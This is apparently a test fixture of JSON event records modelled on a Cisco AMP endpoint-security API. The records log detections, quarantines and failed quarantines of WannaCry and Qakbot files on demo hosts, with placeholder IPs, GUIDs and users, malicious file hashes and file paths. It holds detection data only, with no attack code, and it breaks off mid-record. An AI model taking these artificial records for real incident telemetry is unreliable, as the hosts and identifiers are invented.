-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":573000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870787","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870786","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"","file_path":"","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":479000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412604589194871000,"timestamp":1610637865,"timestamp_nanoseconds":994000000,"date":"2021-01-14T15:24:25+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412604589194870785","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239055241773000,"timestamp":1610637529,"timestamp_nanoseconds":242000000,"date":"2021-01-14T15:18:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419239055241773128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419239050946806000,"timestamp":1610637528,"timestamp_nanoseconds":587000000,"date":"2021-01-14T15:18:48+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419239046651838535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":773000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":648000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":570000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
